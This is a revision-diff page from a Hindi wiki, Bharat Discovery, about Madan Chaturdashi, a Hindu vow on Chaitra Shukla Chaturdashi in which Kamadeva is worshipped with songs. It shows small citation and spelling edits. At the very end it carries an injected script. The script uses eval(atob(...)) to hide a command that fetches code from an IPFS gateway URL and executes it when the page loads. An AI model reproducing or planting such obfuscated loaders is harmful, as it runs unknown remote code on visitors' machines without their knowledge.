Difference between revisions of "मदन चतुर्दशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - ")</ref" to "</ref")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*इसे 'मदनमंजरी' भी कहा जाता है।  
 
*इसे 'मदनमंजरी' भी कहा जाता है।  
 
*[[चैत्र]] [[शुक्ल पक्ष|शुक्ल]] [[चतुर्दशी]] पर यह व्रत किया जाता है।  
 
*[[चैत्र]] [[शुक्ल पक्ष|शुक्ल]] [[चतुर्दशी]] पर यह व्रत किया जाता है।  
*तिथि; गानों एवं ललित शब्दों से मदन ([[कामदेव]]) की पूजा की जाती है।<ref>कृत्यत्त्वं (466)</ref>; <ref>तिथितत्त्व (133)</ref>।
+
*तिथि; गानों एवं ललित शब्दों से मदन ([[कामदेव]]) की पूजा की जाती है।<ref>कृत्यत्त्वं (466</ref>; <ref>तिथितत्त्व (133</ref>।
  
  
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:56, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • ise 'madanamanjari' bhi kaha jata hai.
  • chaitr shukl chaturdashi par yah vrat kiya jata hai.
  • tithi; ganoan evan lalit shabdoan se madan (kamadev) ki pooja ki jati hai.[1]; [2].


tika tippani aur sandarbh

  1. krityattvan (466
  2. tithitattv (133

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>